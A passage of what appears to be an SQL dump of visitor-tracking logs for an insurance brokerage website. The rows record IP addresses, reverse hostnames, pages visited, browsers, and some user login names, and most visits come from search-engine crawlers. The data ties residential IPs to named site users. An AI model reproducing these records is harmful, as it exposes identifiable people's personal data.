Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(6113,'0b_5cc18fdb5e3076e2c3c3b391da8266a6','1458245012','23.239.224.1','23.239.224.1','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(6114,'0b_3ec73594f045b90ca9651b91ca40d66e','1458245209','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6116,'0b_3ec73594f045b90ca9651b91ca40d66e','1458245210','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6119,'0b_3ec73594f045b90ca9651b91ca40d66e','1458245213','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6120,'0b_3ec73594f045b90ca9651b91ca40d66e','1458245232','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(6123,'0b_bf0647951c21714a975699094cbdd68b','1458245533','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empreins.com&src=IE-TopResult&FORM=IETR02&conversationid=','empreins.com',1,'Win7 x64','IE 11','us','1280 x 1024','Bing','','','','','0','0',0),(6125,'0b_bf0647951c21714a975699094cbdd68b','1458245533','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empreins.com&src=IE-TopResult&FORM=IETR02&conversationid=','empreins.com',1,'Win7 x64','IE 11','us','1280 x 1024','Bing','','','','','0','0',0),(6126,'0b_bf0647951c21714a975699094cbdd68b','1458245536','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(6128,'0b_bf0647951c21714a975699094cbdd68b','1458245551','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(6129,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458246043','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6131,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458246044','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6134,'0b_8353e28d1c2865ed2938e98011eb1e38','1458246063','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6137,'0b_8353e28d1c2865ed2938e98011eb1e38','1458246063','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6140,'0b_dfa4b582f562172df8f54b7f011da497','1458247085','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6143,'0b_dfa4b582f562172df8f54b7f011da497','1458247088','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6146,'0b_ac3f9425c05b728fd1d6c1c951263444','1458247207','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Google Chrome','us','1920 x 1080','Google','','','','','0','0',0),(6147,'0b_ac3f9425c05b728fd1d6c1c951263444','1458247219','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(6150,'0b_ac3f9425c05b728fd1d6c1c951263444','1458247261','209.64.152.62','209.64.152.62','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(6152,'0b_ac3f9425c05b728fd1d6c1c951263444','1458247264','209.64.152.62','209.64.152.62','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(6153,'0b_2deed65578ae4e69ca59e9646d3ecef5','1458247406','123.125.71.112','baiduspider-123-125-71-112.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(6156,'0b_76bb1042488f8e8907fac4cadd78b8b6','1458247690','64.209.132.8','null8.wc1.yellowpages.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(6159,'0b_2041e4dbc5c788f4844b66fe686903b7','1458248454','66.249.83.213,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(6161,'0b_54a10a1a6737c6fdf3e1290592daa263','1458248932','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6164,'0b_9645cc7760d144cef9d21d59d53fb7d5','1458249932','52.37.221.240','ec2-52-37-221-240.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6165,'0b_9645cc7760d144cef9d21d59d53fb7d5','1458249961','52.37.221.240','ec2-52-37-221-240.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6168,'0b_9645cc7760d144cef9d21d59d53fb7d5','1458250056','52.37.221.240','ec2-52-37-221-240.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6170,'0b_9645cc7760d144cef9d21d59d53fb7d5','1458250056','52.37.221.240','ec2-52-37-221-240.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6171,'0b_54a10a1a6737c6fdf3e1290592daa263','1458250120','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/life-product-search/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6174,'0b_3f433b60d24e68a44825dc24c5abbe32','1458254756','216.153.28.200','host200-28-153-216.isdn.net','/','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Iceweasel/30.0','','',0,'Linux','Firefox 30','us','','','','','','','0','0',0),(6177,'0b_2023c1b812843bc1498eda5d4e2567c0','1458255077','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6180,'0b_2a8dd1a92deecc29a974fe2127451038','1458257531','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6182,'0b_2a8dd1a92deecc29a974fe2127451038','1458257531','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6183,'0b_2a8dd1a92deecc29a974fe2127451038','1458257533','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6185,'0b_b6044b9ecc97f6cd867684026e361fb9','1458257615','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(6186,'0b_e33080ad24bdc0bc69b8e763d78bc1ed','1458259919','141.8.143.235','spider-141-8-143-235.yandex.com','/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6189,'0b_ba4287dcdf2bc291b51542704ebc317c','1458261325','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6191,'0b_bcda82bc048ce12958894add215ea3d9','1458262938','66.249.73.189','crawl-66-249-73-189.googlebot.com','/products.html','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(6192,'0b_5e536e3db1b1592c4ca8d668affbda80','1458263920','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6194,'0b_acd52b9121363ef963d6f7cb5a59e61b','1458264457','207.46.13.151','msnbot-207-46-13-151.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6195,'0b_acd52b9121363ef963d6f7cb5a59e61b','1458264477','207.46.13.151','msnbot-207-46-13-151.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6197,'0b_a84c093debeccf04d05d4abece04e25b','1458265036','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6198,'0b_a84c093debeccf04d05d4abece04e25b','1458265061','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6200,'0b_5d7275a1c5cda3320b9cfe32dd4d31c4','1458266890','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6203,'0b_5d7275a1c5cda3320b9cfe32dd4d31c4','1458267420','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6204,'0b_d20c5d9d9c3e4a02e6cabbf7ec6bbc12','1458269278','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6206,'0b_d8686c2dde237ca543af5fcacea70415','1458269487','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6209,'0b_d8686c2dde237ca543af5fcacea70415','1458269498','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6210,'0b_d8686c2dde237ca543af5fcacea70415','1458269511','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6213,'0b_d8686c2dde237ca543af5fcacea70415','1458269527','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6216,'0b_2a27e38f5343be18857ece333a15aafc','1458269911','100.43.91.1','spider-100-43-91-1.yandex.com','/home/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6219,'0b_43a295d3717e283d81d35b3a776c246c','1458270814','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6221,'0b_43a295d3717e283d81d35b3a776c246c','1458270815','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6222,'0b_43a295d3717e283d81d35b3a776c246c','1458270820','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(6225,'0b_43a295d3717e283d81d35b3a776c246c','1458270836','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(6228,'0b_009c389e0ee36746de24cf498887c89f','1458270849','46.4.153.245','static.245.153.4.46.clients.your-server.de','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://empireins.com/','',0,'WinXP','IE 6','de','','','','','','','0','0',0),(6230,'0b_102f97a727f5c222818cd60fb88c9c00','1458273398','104.45.128.40','104.45.128.40','/','semanticbot','','',0,'','','','','','','','','','0','0',0),(6233,'0b_102f97a727f5c222818cd60fb88c9c00','1458273417','104.45.128.40','104.45.128.40','/robots.txt','semanticbot','','',0,'','','','','','','','','','0','0',0),(6234,'0b_b52a54b168ef0e1d7973a82f439ada7d','1458274705','198.12.119.202','198-12-119-202-host.colocrossing.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','','',0,'MacOSX','Firefox 29','us','','','','','','','0','0',0),(6236,'0b_f3ebe56322457bc8a941ea43b7397199','1458276749','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6239,'0b_b6125343d631943871155f7d3e689a61','1458279546','172.56.15.66','172.56.15.66','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(6240,'0b_b6125343d631943871155f7d3e689a61','1458279563','172.56.15.66','172.56.15.66','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(6242,'0b_b6125343d631943871155f7d3e689a61','1458279609','172.56.15.66','172.56.15.66','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(6243,'0b_366f157e0270bb17f0e18802c7e927eb','1458284128','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6245,'0b_1aaeed49ad7527610a5df483fbf8ee19','1458284796','52.33.248.246','ec2-52-33-248-246.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6246,'0b_1aaeed49ad7527610a5df483fbf8ee19','1458284830','52.33.248.246','ec2-52-33-248-246.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6249,'0b_1aaeed49ad7527610a5df483fbf8ee19','1458284923','52.33.248.246','ec2-52-33-248-246.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6251,'0b_1aaeed49ad7527610a5df483fbf8ee19','1458284924','52.33.248.246','ec2-52-33-248-246.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6252,'0b_d6180dee67754a6b306c0229be6727d5','1458284926','141.8.143.242','spider-141-8-143-242.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(6255,'0b_3b7bda4476dac1b8f41820e5f3429479','1458285079','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6258,'0b_3b7bda4476dac1b8f41820e5f3429479','1458285216','40.77.167.20','msnbot-40-77-167-20.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6261,'0b_23265059630904c77fa7d8e541ad03c3','1458286677','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6264,'0b_23265059630904c77fa7d8e541ad03c3','1458286679','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6266,'0b_a6d74177d766af8d1bc873afc2a3bbb9','1458287036','40.77.167.60','msnbot-40-77-167-60.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6267,'0b_f12fbe53b6579d7995176c78cf77ed19','1458291967','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6269,'0b_1f9a064bcfa648eb9ed8732aa67b8b6c','1458292140','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6270,'0b_5d084b52125893220617820a9fdff930','1458295665','123.125.71.89','baiduspider-123-125-71-89.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(6273,'0b_3ca48e71c94d186ed534db2e3aec6eb3','1458296921','192.227.245.92','192-227-245-92-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(6276,'0b_3391124ba1e134cdbe3e21b581f96113','1458297161','54.229.161.98','ec2-54-229-161-98.eu-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com','',0,'Win7','Firefox 44','us','','','','','','','0','0',0),(6279,'0b_1cfe96eb3ddbbf512b39b0ea82b93eea','1458298242','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6282,'0b_7795f03642264e85c0b40962053fdc6b','1458300237','173.254.255.58','173.254.255.58.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(6285,'0b_3931e3df17fe3e14e3dda3568d67f7ca','1458300831','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(6287,'0b_f8270810c0b93688075f58f1682885f7','1458302532','54.229.161.98','ec2-54-229-161-98.eu-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','http://EMPIREINS.COM','',0,'Win7','Chrome 46','us','','','','','','','2','0',0),(6290,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303367','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6291,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303367','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6294,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303368','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6296,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303369','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6297,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303369','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6300,'0b_821581e3a9754867c72dfe8b8c93bf7d','1458303370','40.77.167.48','msnbot-40-77-167-48.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6303,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303379','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6305,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303381','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6306,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303381','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6309,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303384','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6312,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303384','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6315,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303385','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6317,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303385','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6318,'0b_b088cd65bf36aef60a1402ba39a93d54','1458303386','207.46.13.131','msnbot-207-46-13-131.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; 